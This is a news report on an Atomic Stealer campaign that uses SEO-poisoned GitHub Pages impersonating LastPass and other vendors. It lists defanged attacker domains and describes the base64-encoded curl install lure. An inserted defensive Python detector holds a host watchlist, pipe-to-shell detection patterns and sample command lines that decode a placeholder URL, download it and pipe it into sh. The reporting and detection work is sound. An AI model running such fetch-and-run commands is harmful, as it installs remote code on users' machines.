A sophisticated cyber-attack campaign is exploiting GitHub Pages to distribute the infamous Atomic Stealer malware to macOS users.
The threat actors behind this operation are leveraging Search Engine Optimization (SEO) techniques to place malicious repositories at the top of search results across major platforms, including Google and Bing, targeting users searching for legitimate software from technology companies, financial institutions, and password management services.
The campaign demonstrates a multi-layered approach in which cybercriminals create fraudulent GitHub repositories that masquerade as official software vendors.
When victims search for specific applications, the poisoned search results redirect them to malicious GitHub Pages hosting what appear to be legitimate software installers.
The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team identified this threat after discovering two fraudulent repositories specifically targeting its customers, both created by the user “modhopmduck476” on September 16, 2025.
Atomic Stealer Campaign Targets macOS Users
The attack chain begins with victims encountering malicious GitHub Pages through SEO-poisoned search results.
SEO-driven referral to malicious software
These repositories contain deceptive “Install [Company] on MacBook” links that redirect users to secondary staging sites.
LastPass impersonation page
In the LastPass case, victims were redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass, which subsequently forwarded them to macprograms-pro[.]com/mac-git-2-download.html.
The secondary site instructs users to execute a terminal command that performs a curl request to a base64-encoded URL.
Secondary site
This encoded URL resolves to bonoud[.]com/get3/install.sh, which downloads the malicious payload, disguised as a system “Update”, to the temporary directory.
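A defender-side check for the delivery step just described, added here as an example and not part of the LastPass write-up: it scans process command lines (of the kind an EDR or the macOS unified log records for shell children) for a curl or wget whose target URL arrives base64-encoded, decodes the token to recover the host, and adds weight when the download is piped straight into a shell. The sample events, the downloads.example.invalid host and the function names are constructed for this example; the watchlist holds only the three hosts the article names.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Hosts named in the LastPass TIME write-up, refanged so decoded URLs can be
# compared against them. The behaviour-based rules below fire whether or not
# the host is on this list, so a new domain from the same campaign still trips them.
WATCHLIST_HOSTS = {"bonoud.com", "macprograms-pro.com", "ahoastock825.github.io"}

# A base64 run long enough to hold a URL; '=' padding optional.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Commands that turn base64 text back into bytes (GNU -d/--decode, macOS -D).
B64_DECODE = re.compile(r"\bbase64\b[^|]*(?:-d|-D|--decode)\b|\bopenssl\s+base64\b[^|]*-d\b")
CURL_OR_WGET = re.compile(r"\b(?:curl|wget)\b")
# A shell interpreter at the tail of a pipeline: '| sh', '| bash -s', '| zsh'.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sh|bash|zsh)\b")

# Constructed sample telemetry (not from the article): one command line per event.
PLACEHOLDER_URL = "https://downloads.example.invalid/get3/install.sh"  # constructed host
ENCODED = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_EVENTS = [
    "curl -fsSL https://example.invalid/releases/tool-1.2.tar.gz -o /tmp/tool.tgz",  # benign
    'curl -H "Authorization: Basic dXNlcjpwYXNzd29yZA==" https://api.example.invalid/v1/me',  # benign
    "echo 'hello' | base64",  # benign: encoding, not decoding, and no download
    f"echo {ENCODED} | base64 -d | xargs curl -fsSL | sh",  # decode -> fetch -> run
    f"curl -fsSL $(echo {ENCODED} | base64 -d) -o /tmp/Update",  # decode -> fetch to temp dir
]


@dataclass
class Finding:
    command: str
    reasons: List[str] = field(default_factory=list)
    decoded_urls: List[str] = field(default_factory=list)
    hosts: List[str] = field(default_factory=list)


def decode_embedded_urls(cmdline: str) -> List[str]:
    """Return every base64 token in the command line that decodes to an http(s) URL."""
    urls = []
    for tok in B64_TOKEN.findall(cmdline):
        padded = tok + "=" * (-len(tok) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="ignore").strip()
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def analyze(cmdline: str) -> Optional[Finding]:
    """Score one command line; return a Finding only if a rule matched."""
    f = Finding(command=cmdline)
    fetches = bool(CURL_OR_WGET.search(cmdline))
    decodes = bool(B64_DECODE.search(cmdline))
    f.decoded_urls = decode_embedded_urls(cmdline)
    f.hosts = [h for h in (urlparse(u).hostname for u in f.decoded_urls) if h]
    if fetches and decodes:
        f.reasons.append("curl/wget combined with base64 decoding in one command line")
    if fetches and f.decoded_urls:
        f.reasons.append("a base64 token decodes to a URL that the command fetches")
    if fetches and PIPE_TO_SHELL.search(cmdline):
        f.reasons.append("downloaded content is piped straight into a shell")
    if set(f.hosts) & WATCHLIST_HOSTS:
        f.reasons.append("decoded URL host is on the published watchlist")
    return f if f.reasons else None


def scan(events: List[str]) -> List[Finding]:
    """Run analyze() over a batch of command lines and keep the hits."""
    return [f for f in (analyze(e) for e in events) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit.command)
        for r in hit.reasons:
            print("  -", r)
        print("  hosts:", hit.hosts)
```

Two of the five constructed events are flagged and the three benign ones are not; the flagged ones are caught by behaviour (decode-then-fetch, pipe-to-shell) even though their host is not on the watchlist, which is the property that matters when the actors rotate domains and GitHub usernames.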
The downloaded file is actually the Atomic Stealer malware, also known as AMOS, which has been active in cybercriminal circles since April 2023.
Atomic Stealer is a sophisticated information-stealing threat specifically designed for macOS environments.
The malware is capable of harvesting sensitive data, including passwords, browser cookies, cryptocurrency wallet information, and system credentials.
Once installed, it establishes persistence on the infected system and communicates with command-and-control (C2) servers to exfiltrate stolen data.
The threat actors have demonstrated operational resilience by creating multiple GitHub usernames to evade takedown efforts.
This distributed approach allows them to maintain their malicious infrastructure even when individual repositories are reported and removed.
The campaign’s scope extends beyond LastPass, with security researchers identifying similar attacks targeting various technology companies and financial institutions through identical tactics, techniques, and procedures (TTPs).
LastPass has successfully coordinated the takedown of the identified malicious repositories and continues monitoring for additional threats.
The company advises macOS users to exercise caution when downloading software through search results and to always verify the authenticity of repositories before executing terminal commands or installing applications from unofficial sources.